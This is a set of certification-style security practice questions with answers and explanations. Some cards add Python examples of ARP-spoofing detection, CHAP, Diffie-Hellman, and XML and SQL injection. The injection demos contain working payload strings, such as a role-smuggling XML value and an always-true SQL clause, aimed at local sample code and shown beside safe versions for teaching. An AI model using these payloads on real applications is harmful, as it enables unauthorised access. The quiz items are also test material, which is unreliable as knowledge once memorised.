Which of the following is a variant of a phishing attack that targets a particular type of user and includes specific information?

Whaling
Pharming
Vishing
Spear phishing

A

Spear phishing

Correct Answer:
Spear phishing involves sending e-mail to a particular type of user, regardless of rank in the organization, and basing the attack on more detailed, in-depth information to convince the target that the phishing e-mail is actually valid.
Incorrect Answers:
Whaling is a social engineering attack that targets people in high-value positions, such as senior executives. It is a form of a phishing attack.
Vishing is a form of phishing attack that takes place over Voice-over-IP (VoIP) telephone systems.
Pharming is a form of DNS attack.

316
Q

Which is the most common public-private key generation algorithm used in public key cryptography?

AES
RSA
SHA-2
ECDH

A

RSA

Correct Answer:
RSA (Rivest-Shamir-Adleman) is the most common public-private key generation algorithm used in public key cryptography. It is used to generate a public and private key pair.
Incorrect Answers:
Elliptic Curve Diffie-Hellman (ECDH) is a key exchange protocol used in public key cryptography. It is used to negotiate, agree upon, and establish a secure session between two parties.
AES is the Advanced Encryption Standard, which is not used in public key cryptography; it is a symmetric key cryptography algorithm.
SHA-2 is the second iteration of the Secure Hashing Algorithm and is used to generate message digests for plaintext. It is not used in public key cryptography to exchange keys or establish secure sessions.

317
Q

Which of the following is a non-secure client-side e-mail protocol that uses TCP port 110?

IMAP4
IMAPS
POP3
SMTP

A

POP3

Correct Answer:
POP3 is a non-secure client-side e-mail protocol that uses TCP port 110.
Incorrect Answers:
SMTP is the protocol for sending mail (server-to-server relay and client-to-server submission), not for retrieving it. Plain SMTP uses TCP port 25; TLS-protected forms exist (STARTTLS on port 587, implicit TLS on port 465), so it is neither a client-side retrieval protocol nor tied to port 110.
IMAPS is a secure version of the IMAP4 protocol and is used over SSL or TLS connections on TCP port 993.
IMAP4 is a non-secure client-side e-mail protocol that uses TCP port 143.

318
Q

Which of the following devices typically makes requests on behalf of internal clients?

Proxy
Firewall
Switch
Router

A

Proxy

Correct Answer:
A proxy is typically not used as a traffic-filtering device based upon port or protocol, but it makes requests on behalf of internal clients.
Incorrect Answers:
A firewall is a more complex device, most often seen placed behind the border router.
A switch does not filter traffic based upon port or protocol, since it works at a lower level in the OSI model.
A router should be used as a first-level filtering device, because it has the ability to filter on basic characteristics of traffic such as port and protocol.

319
Q

What type of control assists and mitigates the risk an existing control is unable to mitigate?

Deterrent control
Corrective control
Compensating control
Preventative control

A

Compensating control

Correct Answer:
A compensating control assists and mitigates the risk an existing control is unable to mitigate.
Incorrect Answers:
The difference between a deterrent control and a preventive control is that it is necessary to have knowledge of the deterrent control for it to work. Users do not need to have knowledge of a preventative control for it to function.
A corrective control is used to correct a condition when there is either no control at all, or the existing control is ineffective. Normally, a corrective control is temporary until a more permanent solution is put into place.
A deterrent control keeps someone from performing a malicious act, provided that they know the control is there and are aware of the consequences for violating it.

320
Q

Which cryptography concept refers to the requirement for a trusted third party that can hold a special key (in addition to your private and public key pair) that is used to decrypt a stored backup copy of the private key if the original is lost?

Certificate authority
CRL
Key escrow
Registrar

A

Key escrow

Correct Answer:
Key escrow involves a third party that holds a special third key in addition to your private and public key pair.
Incorrect Answers:
A CRL (certificate revocation list) is a CA-published list of certificates revoked before their expiry; it holds no keys. Certificate authorities and registrars (registration authorities) issue and manage certificates during the certificate life cycle, but none of these holds a copy of a subscriber's private key for recovery.

321
Q

Which of the following attacks attempts to send unsolicited ARP messages to a client to add false entries to its ARP cache?

Session hijacking attack
ARP poisoning attack
Smurf attack
SYN flood

A

ARP poisoning attack

Correct Answer:
ARP poisoning is an attempt to send unsolicited ARP messages to a client to add false entries to its ARP cache.
Incorrect Answers:
A session hijacking attack is an attempt to hijack a user’s Web browsing session by stealing cookies or using other network attack methods.
A SYN flood is a denial-of-service attack that sends a stream of TCP SYN segments to exhaust a server's half-open connection table; it does not touch ARP.
A smurf attack is a denial-of-service attack that sends ICMP echo requests with a spoofed source address to a broadcast address so that every host on the segment replies to the victim; it does not touch ARP either.
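As an added illustration (not part of the original card), the following Python script shows what the false ARP cache entries described above look like to a defender and how to spot them. It works on two constructed snapshots in the format of Linux `ip neigh show`; the addresses, MACs and the attacker at 192.168.1.50 are invented for the example, and the two detection rules (an IP whose MAC changed, and one MAC now claiming several IPs) are the author's, not anything the card names.

```python
import re
from collections import defaultdict

# Two constructed snapshots of a Linux neighbor table (`ip neigh show` format),
# taken before and after an attacker at 192.168.1.50 sent unsolicited ARP
# replies claiming the gateway's address. Sample lines, not real captures.
BEFORE = """\
192.168.1.1 dev eth0 lladdr 00:11:22:33:44:01 REACHABLE
192.168.1.20 dev eth0 lladdr 00:11:22:33:44:20 STALE
192.168.1.50 dev eth0 lladdr 00:11:22:33:44:50 REACHABLE
"""
AFTER = """\
192.168.1.1 dev eth0 lladdr 00:11:22:33:44:50 REACHABLE
192.168.1.20 dev eth0 lladdr 00:11:22:33:44:20 STALE
192.168.1.50 dev eth0 lladdr 00:11:22:33:44:50 REACHABLE
"""

NEIGH_LINE = re.compile(r"^(\S+) dev (\S+) lladdr ([0-9a-fA-F:]{17}) (\S+)$")


def parse_neigh(text):
    """Return {ip: mac} for every line that carries a resolved link-layer address."""
    table = {}
    for line in text.splitlines():
        m = NEIGH_LINE.match(line.strip())
        if m:
            table[m.group(1)] = m.group(3).lower()
    return table


def find_poisoning(before, after):
    """Flag the two symptoms of ARP poisoning: an IP whose MAC changed between
    snapshots, and a single MAC that now answers for more than one IP."""
    findings = []
    for ip, mac in after.items():
        old = before.get(ip)
        if old is not None and old != mac:
            findings.append(("mac_changed", ip, old, mac))
    by_mac = defaultdict(list)
    for ip, mac in after.items():
        by_mac[mac].append(ip)
    for mac, ips in sorted(by_mac.items()):
        if len(ips) > 1:
            findings.append(("mac_shared", mac, tuple(sorted(ips))))
    return findings


def main():
    for finding in find_poisoning(parse_neigh(BEFORE), parse_neigh(AFTER)):
        print(finding)


if __name__ == "__main__":
    main()
```

On a real host the same logic can be fed from periodic `ip neigh show` output; a static entry for the default gateway (or Dynamic ARP Inspection on the switch) is the usual mitigation once poisoning is confirmed.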

322
Q

If a person does not know a control exists, and this control keeps her from performing a malicious act, what type of control would this be classified as?

Deterrent control
Corrective control
Preventative control
Compensating control

A

Preventative control

Correct Answer:
A preventative control stops someone from performing a malicious act whether or not she knows the control is there; her awareness of the control, or of the consequences for violating it, is irrelevant to its operation.
Incorrect Answers:
A corrective control is used to correct a condition when there is either no control at all or the existing control is ineffective. Normally, a corrective control is temporary until a more permanent solution is put into place.
The difference between a deterrent control and a preventive control is that a deterrent control requires the person to have knowledge of the control in order for it to work. Users do not have to have knowledge of a preventative control for it to function.
A compensating control assists and mitigates the risk an existing control is unable to mitigate.

323
Q

Which of the following methods involves sending individual characters of the key through an algorithm and using a mathematical XOR function to change the output?

Key streaming
Key stretching
Key exchange
Key repetition

A

Key streaming

Correct Answer:
Key streaming is the stream-cipher approach: the key (or a per-message seed built from it) is fed through an algorithm that produces a keystream, and each byte of plaintext is XORed with the corresponding byte of keystream to produce ciphertext. Decryption repeats the same XOR with the same keystream; RC4, as used by WEP, is the classic example.
Incorrect Answers:
Key repetition is not a valid answer or term.
Key exchange is the process by which two parties establish a shared session key, either by sending a symmetric key encrypted under the recipient's public key or by agreeing on one with a protocol such as Diffie-Hellman; exchanging public keys for later use in public key cryptography also falls under it.
Key stretching is a technique used to turn a weak key or password into a stronger key by feeding it, with a salt, through a deliberately slow algorithm such as PBKDF2 or bcrypt, so that brute-force guessing becomes expensive.

324
Q

Marisol needs to interconnect multiple VLANs in her production environment. Which of the following network devices would best address this issue?

Layer 3 switch
Layer 2 switch
Firewall
Router

A

Layer 3 switch

Correct Answer:
A layer 3 switch supports inter VLAN routing to interconnect disparate VLANs.
Incorrect Answers:
A layer 2 switch can carry multiple VLANs over trunk ports, but only to other layer 2 switches or to a router; it cannot forward traffic between VLANs by itself.
A router can interconnect VLANs (router-on-a-stick over a trunk link), but that requires additional configuration and adds a hop, so it is less suitable than a layer 3 switch in a production environment.
A firewall's job is to filter traffic between segments; it is not the device used to provide inter-VLAN switching.

325
Q

Which of the following access control models uses labels and security clearances to grant access to objects?

Discretionary access control model
Role-based access control model
Rule-based access control model
Mandatory access control model

A

Mandatory access control model

Correct Answers:
Mandatory access control models use labels and security clearances to grant access to objects.
Incorrect Answers:
Rule-based access control models use a specific set of rules that control the interaction between users and objects.
Role-based access control models use defined roles with specific rights and permissions assigned to those roles to control access to objects.
Discretionary access control allows a user who has created or owns an object, such as a file or folder, the discretion to assign permissions for that object to anyone they choose.

326
Q

Which of the following terms indicates the amount of time it takes for a hardware component to recover from failure?

Mean time to replace
Mean time to recovery
Mean time to failure
Mean time between failures

A

Mean time to recovery

Correct Answer:
Mean time to recovery (MTTR) is the amount of time it takes for a hardware component to recover from failure.
Incorrect Answers:
Mean time between failures (MTBF) represents the manufacturer’s best guess (based on historical data) regarding how much time will pass between major failures of that component. This is assuming that more than one failure will occur, which means that the component will be repaired, rather than replaced.
The mean time to failure (MTTF) is the length of time a device is expected to last in operation. In MTTF, only a single, definitive failure will occur and will require that the device be replaced rather than repaired.
Mean time to replace is not a valid term.

327
Q

Which of the following forms of authentication uses password hashes and challenge methods to authenticate to the system?

EAP
MS-CHAP
PAP
CHAP

A

CHAP

Correct Answer:
Challenge-Handshake Authentication Protocol (CHAP) uses password hashes and challenge methods to authenticate to the system.
Incorrect Answers:
The Password Authentication Protocol (PAP) is an older authentication method that passes usernames and passwords in clear text. For this reason, it should no longer be used. CHAP, in contrast, never sends the password itself across the link; only a hash computed from the password and a one-time challenge is sent.
MS-CHAP (Microsoft CHAP) is a Microsoft proprietary version of CHAP, native to Windows systems.
The Extensible Authentication Protocol (EAP) is a modern authentication framework that can use various authentication methods. It also does not pass user name and password information in clear text.
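The following Python example is added here to show the CHAP challenge/response exchange end to end; it is not code from the card. It implements the MD5 variant from RFC 1994 (Response = MD5(Identifier || Secret || Challenge)), with both the peer and the authenticator side; the shared secret and the user name are constructed values. Note the caveat it makes visible: the authenticator must store the shared secret in recoverable form, because it has to compute the same hash.

```python
import hashlib
import hmac
import os

# Shared secret provisioned on both the peer and the authenticator (constructed value).
SECRET = b"correct horse battery staple"


def chap_response(identifier, secret, challenge):
    """RFC 1994 CHAP with MD5: Response = MD5(Identifier || Secret || Challenge).
    The secret itself never crosses the link; only this hash does."""
    return hashlib.md5(bytes([identifier]) + secret + challenge).digest()


class Authenticator:
    """Server side. Remembers the outstanding challenge per Identifier so that
    each challenge can be answered exactly once."""

    def __init__(self, secrets):
        self.secrets = secrets    # name -> shared secret (stored reversibly: a CHAP caveat)
        self.pending = {}         # identifier -> challenge awaiting a response

    def challenge(self, identifier):
        chal = os.urandom(16)     # fresh random challenge for every attempt
        self.pending[identifier] = chal
        return chal

    def verify(self, identifier, name, response):
        chal = self.pending.pop(identifier, None)   # a challenge is consumed on first use
        secret = self.secrets.get(name)
        if chal is None or secret is None:
            return False
        expected = chap_response(identifier, secret, chal)
        return hmac.compare_digest(response, expected)   # constant-time comparison


def run_exchange(secret_on_peer, name="alice", identifier=1):
    """Full three-way exchange: Challenge -> Response -> Success/Failure."""
    auth = Authenticator({"alice": SECRET})
    chal = auth.challenge(identifier)                        # 1. authenticator sends Challenge
    resp = chap_response(identifier, secret_on_peer, chal)   # 2. peer sends Response
    return auth.verify(identifier, name, resp)               # 3. Success (True) or Failure (False)


def replay_is_rejected(identifier=1):
    """A captured Response cannot be replayed: the challenge it answered is gone."""
    auth = Authenticator({"alice": SECRET})
    chal = auth.challenge(identifier)
    resp = chap_response(identifier, SECRET, chal)
    first = auth.verify(identifier, "alice", resp)
    second = auth.verify(identifier, "alice", resp)
    return first and not second


if __name__ == "__main__":
    print("correct secret:", run_exchange(SECRET))
    print("wrong secret:  ", run_exchange(b"wrong"))
    print("replay blocked:", replay_is_rejected())
```

Because the challenge is random and consumed once, a sniffer who records a valid Response gains nothing; what a sniffer does get is an offline guessing target (MD5 is fast), which is why CHAP should run over an encrypted link or give way to EAP methods with TLS.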

328
Q

Which of following uses geolocation features to ensure that a mobile device does not leave specific areas of corporate property?

Geolocation
Geotagging
Geofencing
Remote management

A

Geofencing

Correct Answer:
Geofencing is the use of geolocation features to ensure that a mobile device does not leave specific areas of corporate property.
Incorrect Answers:
Remote management is the overall process of remotely managing and monitoring mobile devices that are used to connect to the corporate infrastructure.
Geolocation is the use of a device’s GPS features to determine device location, locate points of interest, and find other useful information.
Geotagging is the practice of marking media files, such as pictures and video, with relevant information such as geographic location (using the GPS features of the mobile device) and time. This information can be used by security professionals to track where and how a mobile device has been used.

329
Q

Three organizations require access to each other’s shared resources. To enable access, the three groups decide to use a single sign-on database that all three agree will handle authentication. What form of trust relationship is this?

One-way trust
Web of trust
Transitive trust
Federated trust

A

Federated trust

Correct Answer:
A federated system involves the use of a common authentication system and credentials database that multiple entities use and share.
Incorrect Answers:
A web of trust isn't a trust relationship between organizations; it is the decentralized model (used by PGP) in which individual users vouch for each other's public keys by signing them.
A one-way trust means one party trusts another but not the reverse.
A transitive trust means that if entity B trusts entity A and entity C trusts entity B, then entity C trusts entity A.

330
Q

A virtual LAN (VLAN) does NOT offer which of the following security controls?

Creates broadcast domains

Allows logical segmentation of hosts by IP subnet

Allows different security policies to be applied to different hosts

Allows physical segmentation of hosts by IP subnet

A

Allows physical segmentation of hosts by IP subnet

Correct Answer:
VLANs do not physically segment hosts; they logically segment them.
Incorrect Answers:
VLANs break up broadcast domains from a single large one into smaller, logically separated ones.
VLANs allow different segments to receive different security policies.

331
Q

Which of the following is a key negotiation and agreement protocol used in public key cryptography?

OCSP
DHE
ECC
RSA

A

DHE

Correct Answers:
Diffie-Hellman (DHE; the E stands for ephemeral, meaning each session uses a fresh private value) is a key negotiation and agreement protocol used in public key cryptography. Neither party ever sends the shared secret: each sends only a public value, and both derive the same key locally.
Incorrect Answers:
RSA is the de facto standard used to generate public and private key pairs in a PKI.
The Online Certificate Status Protocol (OCSP) is used to obtain the revocation status of digital certificates. It is used as an alternative to certificate revocation lists, enabling clients to request and receive the electronic status of digital certificates automatically in real-time.
Elliptic curve cryptography (ECC) is a family of public key algorithms (ECDH, ECDSA) that reaches equivalent security with much shorter keys, which is why it is favored on small mobile devices with low power and computing budgets.
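To show what "negotiate and agree on a key without sending it" means in practice, here is an added Python example of an ephemeral Diffie-Hellman exchange; it is not code from the card. It uses the 1024-bit MODP group 2 parameters from RFC 2409 (generator 2) only because they are short enough to embed; production code should use a larger group (for instance RFC 7919 ffdhe2048) or ECDH. The party names are constructed.

```python
import hashlib
import secrets

# 1024-bit MODP group 2 from RFC 2409 (generator 2). Embedded here because it is
# short; use a larger group or ECDH for real systems.
P = int("".join("""
FFFFFFFF FFFFFFFF C90FDAA2 2168C234 C4C6628B 80DC1CD1 29024E08 8A67CC74
020BBEA6 3B139B22 514A0879 8E3404DD EF9519B3 CD3A431B 302B0A6D F25F1437
4FE1356D 6D51C245 E485B576 625E7EC6 F44C42E9 A637ED6B 0BFF5CB6 F406B7ED
EE386BFB 5A899FA5 AE9F2411 7C4B1FE6 49286651 ECE65381 FFFFFFFF FFFFFFFF
""".split()), 16)
G = 2


class Party:
    """One side of an ephemeral Diffie-Hellman exchange."""

    def __init__(self, name):
        self.name = name
        self.private = secrets.randbelow(P - 2) + 1   # fresh per session: the "E" in DHE
        self.public = pow(G, self.private, P)         # the only value that goes over the wire

    def shared_key(self, peer_public):
        # Reject degenerate public values (0, 1, p-1) that would force a trivial secret.
        if not 2 <= peer_public <= P - 2:
            raise ValueError("invalid peer public value")
        shared = pow(peer_public, self.private, P)
        # Never use the raw group element as a key; derive a fixed-size session key from it.
        return hashlib.sha256(shared.to_bytes((P.bit_length() + 7) // 8, "big")).digest()


def run_exchange():
    """Both sides compute the same session key from each other's public value only."""
    alice, bob = Party("alice"), Party("bob")
    k_alice = alice.shared_key(bob.public)
    k_bob = bob.shared_key(alice.public)
    return k_alice, k_bob


def rejects_degenerate_public(value):
    try:
        Party("alice").shared_key(value)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    k_alice, k_bob = run_exchange()
    print("keys match:", k_alice == k_bob, k_alice.hex())
```

A passive eavesdropper sees only P, G and the two public values; recovering the key requires solving the discrete logarithm. Because each party draws a new private exponent per session, compromising a long-term key later does not expose past sessions (forward secrecy), which is what the DHE cipher suites in TLS buy over plain RSA key transport. What the exchange does not provide is authentication: each public value still has to be signed or otherwise tied to its owner, or an active attacker can run two exchanges and sit in the middle.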

332
Q

Which of the following are usually annoying advertisements that come in the form of pop-up messages in a user’s browser?

Trojan
Virus
Adware
Logic bomb

A

Adware

Correct Answers:
Adware is usually annoying advertisements that come in the form of pop-up messages in a user’s browser.
Incorrect Answers:
A virus is a piece of malicious software that must be propagated through a definite user action.
A Trojan is a piece of software that seems to be of value to the user, but in reality is malware.
A logic bomb is a script set to execute at a certain time, which is usually created by rogue administrators or disgruntled employees.

333
Q

Which of the following statements best describes an XML injection attack?

An attack on a database through vulnerabilities in the Web application, usually in user input fields.

An attack that involves sending malicious XML content to a Web application, taking advantage of any lack of input validation and XML parsing.

An attack that exceeds the memory allocated to an application for a particular function, causing it to crash.

An attack that uses unexpected numerical results from a mathematical operation to overflow a buffer.

A

An attack that involves sending malicious XML content to a Web application, taking advantage of any lack of input validation and XML parsing.

Correct Answer:
An XML injection attack involves sending malicious XML content to a Web application, taking advantage of any lack of input validation and XML parsing.
Incorrect Answers:
A buffer overflow attack exceeds the memory allocated to an application for a particular function, causing it to crash.
Although similar to a buffer overflow, the fourth option describes an integer overflow attack, which uses unexpected numerical results from a mathematical operation (for example a length that wraps around to a small value) to cause a buffer to be over-filled.
A SQL injection attacks a database through vulnerabilities in the Web application, usually in user input fields.
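As an added example (not from the card), the Python below shows an XML injection of the kind described above, beside the fix. The user-record format, the attacker's payload and the downstream consumer that reads the first `<role>` element are all constructed for the illustration; the point is that building markup by string concatenation lets input become structure, while building it through the XML API escapes the input.

```python
import xml.etree.ElementTree as ET

# Attacker-controlled username (constructed). It closes the <name> element and
# smuggles in a <role> element of its own before reopening <name>.
PAYLOAD = "mallory</name><role>admin</role><name>"


def build_user_unsafe(username, email):
    """Vulnerable: untrusted input is concatenated straight into the markup."""
    return (f"<user><name>{username}</name><email>{email}</email>"
            f"<role>user</role></user>")


def build_user_safe(username, email):
    """Hardened: the document is built through the XML API, which escapes
    < > & in text nodes so input can never become markup."""
    user = ET.Element("user")
    ET.SubElement(user, "name").text = username
    ET.SubElement(user, "email").text = email
    ET.SubElement(user, "role").text = "user"
    return ET.tostring(user, encoding="unicode")


def effective_role(xml_doc):
    """Models a downstream service that parses the record and honours the first
    <role> it finds (which duplicate wins varies by parser and application)."""
    root = ET.fromstring(xml_doc)
    role = root.find("role")
    return role.text if role is not None else None


def stored_name(xml_doc):
    return ET.fromstring(xml_doc).find("name").text


if __name__ == "__main__":
    print(build_user_unsafe(PAYLOAD, "m@example.com"))
    print("unsafe role:", effective_role(build_user_unsafe(PAYLOAD, "m@example.com")))
    print("safe role:  ", effective_role(build_user_safe(PAYLOAD, "m@example.com")))
```

The escaped document stores the payload as literal text, so the consumer still sees `user` and the name round-trips unchanged. Input validation (rejecting `<` and `>` in a username) is a reasonable second layer, but output encoding at the point where the XML is built is the control that holds regardless of what was validated upstream.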

334
Q

Which of the following attacks targets relational databases that reside behind Web applications?

Directory traversal attack
LDAP injection attack
SQL injection attack
Integer overflow attack

A

SQL injection attack

Correct Answer:
A SQL injection attack targets relational databases that reside behind Web applications.
Incorrect Answers:
An LDAP injection attack targets directory services databases, such as those used in X.500 implementations.
A directory traversal attack uses ../ sequences or absolute paths in user-supplied file names to reach files outside the directory the application intended to expose.
An integer overflow attack is similar to a buffer overflow attack and results in mathematical operations that the host or application cannot handle, causing them to fail.
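The Python below is an added example (not from the card) of the SQL injection described above, using an in-memory SQLite database with two constructed accounts. It pairs a login query built by string formatting with the parameterized form, and runs the classic `' OR '1'='1` payload against both.

```python
import sqlite3

# Constructed payload: closes the password literal and appends an always-true clause.
PAYLOAD = "x' OR '1'='1"


def make_db():
    """In-memory table with two constructed accounts. A real application would
    store password hashes; the injection point is the same either way."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "s3cret"), ("bob", "hunter2")])
    return conn


def login_unsafe(conn, username, password):
    """Vulnerable: user input is spliced into the SQL text, so a quote in the
    input changes the statement's logic instead of being data."""
    query = (f"SELECT username FROM users WHERE username = '{username}' "
             f"AND password = '{password}'")
    return [row[0] for row in conn.execute(query)]


def login_safe(conn, username, password):
    """Hardened: parameterized query. The driver passes values separately from
    the statement, so input can only ever be compared, never executed."""
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in conn.execute(query, (username, password))]


if __name__ == "__main__":
    conn = make_db()
    print("unsafe, payload as password:", login_unsafe(conn, "alice", PAYLOAD))
    print("safe,   payload as password:", login_safe(conn, "alice", PAYLOAD))
    print("safe,   real password:      ", login_safe(conn, "alice", "s3cret"))
```

With the payload in the password field the vulnerable statement becomes `... AND password = 'x' OR '1'='1'`; since AND binds tighter than OR, the whole WHERE clause is true for every row and both accounts come back. The parameterized query compares the password column against the literal string and returns nothing.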

335
Q

Which of the following terms describes a security appliance that is usually installed on an individual device, usually as a chip on the system motherboard?

SAN
HSM
TPM
NAS

A

TPM

Correct Answer:
A Trusted Platform Module (TPM) is installed on an individual device, usually as a chip on the system motherboard.
Incorrect Answers:
A hardware security module (HSM) is usually a hardware appliance or standalone device used to provide hardware encryption services for specific hosts.
A SAN is a storage area network and is not typically a security device.
A NAS, network attached storage, is not a security device.

336
Q

What is the last step in the incident response life cycle?

Detection and analysis
Preparation
Containment, eradication, and recovery
Post-incident activity

A

Post-incident activity

Correct Answer:
Post-incident activity is the last step of the incident response life cycle.
Incorrect Answers:
In order, the steps of the incident response life cycle are preparation; detection and analysis; containment, eradication, and recovery; and post-incident activity.

337
Q

Mike has five Linux systems that need access to a shared folder on a Windows file server that's part of an Active Directory (AD) domain. What can he do to give these systems access to the shared resource? (Choose two.)

Install and configure SAMBA on the Linux systems to access the AD.

Create new local users on the domain controller.

Create user groups on all the Linux systems.

Configure access to the resource on the file server.

A

Install and configure SAMBA on the Linux systems to access the AD.
Configure access to the resource on the file server.

Correct Answers:
Install and configure Samba on the Linux systems so they can authenticate against the AD domain and speak SMB/CIFS, and then grant access to the resource on the sharing system (in this case the file server).
Incorrect Answers:
Local Linux user groups mean nothing to the Windows file server; access is decided by the AD identities and by the share and NTFS permissions on the server.
One should rarely create local users on a domain controller; domain accounts are used instead.

338
Q

Which of the following security controls should be implemented to make sure that users require previous knowledge of the network identifier to join a network?

Add a VLAN.
Change the transmitting frequencies.
Disable SSID broadcasting.
Use MAC address filtering.

A

Disable SSID broadcasting.

Correct Answer:
Disable Service Set Identifier (SSID) broadcasting if you're not actively advertising your network name. When this control is implemented, a user must know the name of the network before he or she can connect to it. Treat this as obscurity rather than real access control: the SSID still appears in clear text in probe and association frames whenever a client connects, so a wireless sniffer recovers it quickly.
Incorrect Answers:
None of these options controls who can join the network based on knowledge of the SSID. MAC filtering and VLANs control access on other criteria, and changing frequencies (channels) has no access-control effect.

339
Q

Which of the following is a non-secure protocol used to copy files to and from Internet-based hosts?

SCP
FTP
SFTP
FTPS

A

FTP

Correct Answer:
FTP is a non-secure protocol used to copy files to and from Internet-based hosts.
Incorrect Answers:
FTPS is a secure version of the non-secure FTP protocol, which is used over SSL or TLS connections to ensure security when transferring files to or from an Internet-based host.
SCP is a secure copy protocol used to copy files securely to and from a networked host, and it uses SSH.
SFTP is a secure file transfer protocol used to copy files to and from an Internet-based host, and it uses SSH.

340
Q

Which of the following processes uses auditing to ensure that users are traced to and held responsible for their actions?

Authentication
Authorization
Auditing
Accountability

A

Accountability

Correct Answer:
Accountability uses auditing to ensure that users are traced to and held responsible for their actions.
Incorrect Answers:
Authorization is the process of controlling access to resources through methods that include permissions, rights, and privileges.
Authentication is the process of validating that a user's credentials are authentic, after they have been presented through the identification process.
Auditing is the process of reviewing logs and other audit trails to determine what actions have been performed on systems and data.

341
Q

Which of the following best describes cookies?

Small text files stored on a browser that contain information about the Web sites you visit.

Objects that are particular to Web sites that use the Adobe Flash player for certain content.

HTTP request and response messages.

An HTML file that comes attached to an e-mail.

A

Small text files stored on a browser that contain information about the Web sites you visit.

Correct Answer:
Small text files stored by a browser that contain information about the Web sites you visit are called cookies. In some cases they are used to retain user preferences for the site, but they can also contain sensitive information such as session identifiers, user credentials, or financial data (credit card information, for example).
Incorrect Answers:
HTTP request and response messages are sent back and forth between the Web application and the browser so the client can access content in the Web application.
These HTTP requests and responses have headers that contain information such as commands, directives, and so on.
An HTML file that comes attached to an e-mail is an HTML attachment. Locally shared objects (also called Flash cookies) are objects that are particular to Web sites that use the Adobe Flash player for certain content.

342
Q

Which of the following is used in Windows systems to identify a user account?

Security identifier (SID)
Access control entry (ACE)
User identifier (UID)
Group identifier (GID)
A

Security identifier (SID)

Correct Answer:
A security identifier (SID) is a unique value assigned to each user, group, and computer account. It is never reused, even when an account is deleted and re-created with the same name; the new account receives a new SID, which is why a re-created account does not inherit the old account's permissions.
Incorrect Answers:
Both a UID and GID refer to unique numbers in Linux and UNIX-based systems that identify users and groups.
An access control entry (ACE) is a unique entry in an access control list (ACL) that describes a user’s permissions for accessing objects.

343
Q

Which of the following is most appropriate if you have limited external public IP addresses available, but a requirement to share those IP addresses with internal hosts that must connect to the public Internet?

NAT with a firewall
DMZ
DHCP server
Router

A

NAT with a firewall

Correct Answer:
Using network address translation (NAT) in conjunction with a firewall enables you to share one external address with multiple internal hosts that require external addresses for their connectivity.
Incorrect Answers:
A DMZ can contain servers behind a firewall, allowing public access, but it does not inherently offer NAT services.
DHCP is used to allocate internal IP addresses, and a router still requires NAT to perform address translation.

344
Q

What type of evidence is generally in the form of charts, graphs, or drawings to help non-technical people?

Exculpatory evidence
Documentary evidence
Demonstrative evidence
Inculpatory evidence

A

Demonstrative evidence

Correct Answer:
Demonstrative evidence, which can be in the form of charts, graphs, drawings, and so forth, is used to help non-technical people, such as the members of a jury, understand an event.
Incorrect Answers:
Exculpatory evidence proves innocence.
Inculpatory evidence proves guilt.
Documentary evidence directly supports or proves a definitive assertion.

345
Q

Which type of assessment looks at events that could exploit vulnerabilities?

Vulnerability assessment
Penetration test
Threat assessment
Risk assessment

A

Threat assessment

Correct Answer:
A threat assessment looks at events that could exploit vulnerabilities.
Incorrect Answers:
A vulnerability assessment looks for weaknesses in systems.
A risk assessment is a combination of assessments and is designed to assess factors, including likelihood and impact that affect an asset.
A penetration test attempts to exploit actual vulnerabilities found within the systems.

346
Q

Which of the following are used to back up files that have changed since the last full backup of a virtual machine? (Choose two.)

Incremental backup
Differential backup
Snapshot
System state backup

A

Incremental backup
Differential backup

Correct Answers:
Both apply to entire systems. A differential backup copies every file that has changed since the last full backup, so each differential grows until the next full. An incremental backup copies only the files that have changed since the last backup of any type (full or incremental), so each one is small but a restore needs the full plus every incremental in order.
Incorrect Answers:
A snapshot captures a virtual machine's disk (and optionally memory) state at a point in time; the hypervisor uses it to roll the VM back should it become unstable or suffer other issues. It is not a file-level backup of changes since the last full.
The system state backup is a Microsoft Windows type of backup that backs up critical files used by the operating system (registry, boot files, Active Directory on a domain controller) to restore the system in the event of a system crash or other issue.

347
Q

Which of the following is normally the job of a senior leader within the incident response team?

Notifying and coordinating with senior management and law enforcement officials

Notifying the incident response team

Determining the initial scope and impact of the incident

Securing the scene

A

Notifying and coordinating with senior management and law enforcement officials

Correct Answer:
Notifying and coordinating with senior management and law enforcement officials is normally the job of a senior leader within the incident response team.
Incorrect Answers:
The primary job of a first responder is to secure the scene.
They are also responsible for notifying the incident response team and initially determining the scope, seriousness, and impact of the incident.

348
Q

You are the security administrator for a small business. You want to provide your users with the ability to encrypt outbound e-mail messages, but the company cannot afford an expensive encryption solution. Which of the following is the best option?

WPA2
HTTPS
POP/IMAP
PGP/GPG

A

PGP/GPG

Correct Answer:
Pretty Good Privacy (or GNU Privacy Guard) is a low-cost solution that enables encrypted e-mail messages.
Incorrect Answers:
HTTPS provides encryption for Web communications, not e-mail.
POP/IMAP are unencrypted mail client access protocols.
WPA2 provides encryption for wireless networks, not e-mail.

349
Q

Which of the following requires team members to go through the motions of fulfilling the responsibilities and conducting the activities required during an actual incident or disaster?

Walkthrough test
Full-scale test
Tabletop exercise
Documentation review

A

Walkthrough test

Correct Answer:
In a walkthrough test, team members go through the motions of fulfilling the responsibilities and conducting the activities required during an actual incident or disaster.
Incorrect Answers:
A tabletop exercise is a discussion-based exercise in which team members talk through their response to a scenario around a table without performing any actual recovery actions.
The documentation review is the simplest form of test, in which the business continuity plan, disaster recovery plan, and associated documents are reviewed by relevant personnel including managers, recovery team members, and anyone else who may have responsibilities directly affecting plans.
In a full-scale test, all personnel are usually involved and may actually conduct activities as they would during a real incident. This type of test is more complex and normally requires extensive resources, such as people and equipment, so it is typically conducted infrequently.

350
Q

Which of the following is a cryptographic representation of text, but not the text itself? (Choose two.)

Ciphertext
Plaintext
Hash
Message digest

A

Hash
Message digest

Correct Answers:
A hash or message digest is a cryptographic representation of variable length text, but it is not the text itself.
Incorrect Answers:
Plaintext is unencrypted text.
Ciphertext is a result of the encryption process and is encrypted text.

351
Q

Which attack involves sending specially-crafted traffic to a wireless client and an access point?

Replay attack
Deauthentication attack
Spoofing attack
Initialization vector attack

A

Deauthentication attack

Correct Answer:
A deauthentication attack involves sending specially crafted traffic to a wireless client and an access point, in the hopes of causing them to deauthenticate with each other and disconnect.
Incorrect Answers:
A spoofing attack involves impersonating a wireless client or access point through either its IP or its MAC address.
A replay attack involves the reuse of intercepted non-secure credentials to gain access to a system or network.
Initialization vector (IV) attacks involve attempting to break WEP keys by targeting their weak IVs.

352
Q

